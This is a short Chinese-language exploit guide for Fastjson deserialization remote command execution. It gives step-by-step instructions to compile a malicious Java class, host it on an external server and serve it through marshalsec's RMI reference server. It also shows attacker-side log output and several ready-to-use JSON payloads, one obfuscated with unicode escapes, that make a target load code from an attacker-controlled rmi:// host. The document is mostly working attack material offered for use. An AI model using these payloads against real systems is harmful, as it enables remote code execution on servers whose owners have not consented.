Fastjson命令执行

# Fastjson漏洞可以命令执行

攻击流程：
– 1.找一台装有java的机器，运行 javac ExportObject.java会得到ExportObject.class
– 2.将ExportObject.class放到外网http服务器上，比如。http://你的服务器ip/ExportObject.class
– 3.在外网服务器上运行java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://你的服务器ip/#ExportObject 10086 表示该http下的class转换成rmi服务
– 4.在目标站点运行

攻击方：
“`
root@test:~/tools/rmi# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://183.2.xxx.xxx/#Exploit 10086

* Opening JRMP listener on 10086

Have connection from /121.xxx.xxx.xxx:55837

Reading message…

Is RMI.lookup call for Exploit 2

Sending remote classloading stub targeting http://183.2.xxx.xxx/Exploit.class

Closing connection
“`
1. 老的
“`
{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://恶意主机:端口/Object”,”autoCommit”:true}
{\”@type\”:\”LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;\”,\”dataSourceName\”:\”rmi://xxx.24.xxx.xxx:80/Object\”,\”autoCommit\”:true}
{“name”:{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://183.2.xxx.xxx:10086/Exploit”,”autoCommit”:true},age:12}
“`
2. 包括1.2.45的
“`
{“name”:{“@type”:”org.apache.ibatis.datasource.jndi.JndiDataSourceFactory”,”properties”:{“data_source”:”rmi://xxx.2.xxx.xxx:10086/Exploit”},”autoCommit”:true},age:12}
“`